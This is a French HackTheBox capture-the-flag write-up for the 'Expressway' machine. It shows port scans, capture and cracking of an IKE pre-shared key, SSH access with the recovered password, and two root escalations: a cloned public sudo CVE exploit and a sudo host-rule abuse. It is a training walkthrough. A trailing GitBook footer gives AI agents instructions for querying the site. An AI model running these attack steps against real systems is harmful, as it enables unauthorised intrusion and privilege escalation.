> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/writeups-ctf/hackthebox/linux-easy/expressway-hackthebox-writeup.md).

# Compte rendu HackTheBox d’Expressway

{% embed url="<https://app.hackthebox.com/machines/Expressway>" %}

{% hint style="warning" %}
**Compétences :**

* Connaissances sur l’énumération et l’exploitation du service IKE
* Énumération du système Linux
* Exploitation de CVE-2025-32462
  {% endhint %}

#### **Configuration de l'espace de travail :**

Configurez l'espace de travail en créant trois dossiers pour stocker le contenu important, les exploits et les résultats de reconnaissance Nmap.

<figure><img src="/files/2a057e91a5d42cd00a2cc53228cb185bfe3b6e91" alt="" width="563"><figcaption></figcaption></figure>

#### **Vérification de la connectivité VPN**

Vérifiez la connectivité VPN pour assurer une communication stable avec la machine cible.

<figure><img src="/files/f88c549491bfe8b4848960a8fced0919e6186459" alt="" width="563"><figcaption></figcaption></figure>

#### **Découverte des ports ouverts avec Nmap :**

La première étape consiste à identifier les services exposés. Nous effectuons un scan rapide des ports TCP et UDP.

#### Scan TCP

```bash
nmap -p- --open -sS -n -Pn --min-rate 5000 10.129.238.52 -oG allPort
```

#### Scan UDP

```bash
nmap -sU --top-ports 100 --open -vvv -n 10.129.238.52 -oG allPortsUDP
```

<figure><img src="/files/ce6b6749727b8a750bf9737ad3213b92682397eb" alt=""><figcaption></figcaption></figure>

#### Analyse des services et des versions

Après avoir identifié les ports, nous examinons plus en détail les services spécifiques :

* TCP : Port 22 (SSH)
* UDP : Ports 68, 69 (TFTP), 500 (ISAKMP/VPN), 4500 (IPsec-NAT-T)

```bash
nmap -sCV -p22 10.129.238.52 -oN targeted
```

```bash
nmap -sUCV -p 68,69,500,4500 10.129.238.52 -oN targetedUDP
```

<figure><img src="/files/91fd84c8974a90cf33b949fd73a41ddd6995aab2" alt=""><figcaption></figcaption></figure>

### Intrusion : exploitation IKE (VPN)

Le port UDP 500 indique un service d’échange de clés (IKE). Nous tentons de capturer la clé pré-partagée (PSK) en utilisant le mode agressif.

#### Identification de l’ID

Nous utilisons `ike-scan` pour vérifier si le mode agressif est activé :.

```bash
sudo ike-scan -A 10.129.238.52
```

* Résultat : négociation réussie. ID détecté : `ike@expressway.htb`.

#### Capturer et casser le hachage du PSK

<figure><img src="/files/d317399820376ef2ab02200130ea811a043ede56" alt=""><figcaption></figcaption></figure>

```bash
sudo ike-scan -A -id ike@expressway.htb --pskcrack=expressway.psk 10.129.238.52
```

Nous extrayons le hachage pour tenter une attaque par force brute avec le `rockyou.txt` dictionnaire.

```bash
hashcat expressway.psk /usr/share/wordlists/rockyou.txt
```

* Identifiants obtenus : `ike`: `freakingrockstarontheroad`

<figure><img src="/files/f6df113769d3b60e1001b999425c6dcf8ad5debf" alt=""><figcaption></figcaption></figure>

#### Accès initial

Connexion via SSH avec les identifiants trouvés :

```bash
ssh ike@10.129.238.52
```

## Élévation de privilèges

Deux vecteurs ont été confirmés pour élever les privilèges jusqu'à root.

### Méthode 1 : CVE-2025-32463 (vulnérabilité sudo)

En vérifiant la version de sudo avec `sudo -V`, nous voyons que la version est la 1.9.17, qui est vulnérable.

{% embed url="<https://github.com/MohamedKarrab/CVE-2025-32463>" %}

<figure><img src="/files/99e9cd42e05e2dc979027555aa1e4da461d38f98" alt=""><figcaption></figcaption></figure>

1. Cloner l'exploit :

```bash
git clone https://github.com/MohamedKarrab/CVE-2025-32463.git
cd CVE-2025-32463
```

Exécution des scripts de compilation et d'exploitation :

```bash
./mkall-dynamic.sh
./get_root.sh
```

<figure><img src="/files/bbbe3c32e413c08484d300c83ca84f8ace807001" alt=""><figcaption></figcaption></figure>

### Méthode 2 : abus du groupe Proxy et des noms d'hôte

En auditant les groupes de l'utilisateur, nous constatons que nous appartenons au groupe proxy. Nous recherchons les fichiers associés :

<figure><img src="/files/127afdd9d6b31b8893db11134c8b57bab189bb8f" alt=""><figcaption></figcaption></figure>

En examinant les journaux Squid (`/var/log/squid/access.log.1`)

```bash
find / -group proxy 2>/dev/null
```

<figure><img src="/files/f34084fb025beec28ba97a63814eae3459c4c777" alt=""><figcaption></figcaption></figure>

Nous découvrons un sous-domaine interne : `offramp.expressway.htb`.

```bash
cat /var/log/squid/access.log.1 | grep httpp
```

<figure><img src="/files/9b3aabfbf54d0b49e6ec47846b3b11ef5a3044bd" alt=""><figcaption></figcaption></figure>

En vérifiant les politiques sudo pour ce domaine spécifique, nous découvrons que nous avons tous les droits :

```bash
sudo -h offramp.expressway.htb -l
```

Résultat : nous pouvons exécuter n'importe quelle commande en tant que root dans ce contexte d'hôte.

<figure><img src="/files/4a53ec672a173d0171a59f896e9751ef18cff4ec" alt=""><figcaption></figcaption></figure>

**Exécution finale pour root :**

```bash
sudo -h offramp.expressway.htb /bin/bash
```

<figure><img src="/files/ee139494e5b37b927e195705759470fdc41a38c5" alt=""><figcaption></figcaption></figure>

### Drapeau root.txt :)

<figure><img src="/files/36b31f2d0fd013c6863a387e2ca4b4192eb19028" alt="" width="524"><figcaption></figcaption></figure>

<figure><img src="/files/c10d031a820c86127d2b9a85f928d8a66c6c9ea3" alt="" width="389"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/writeups-ctf/hackthebox/linux-easy/expressway-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
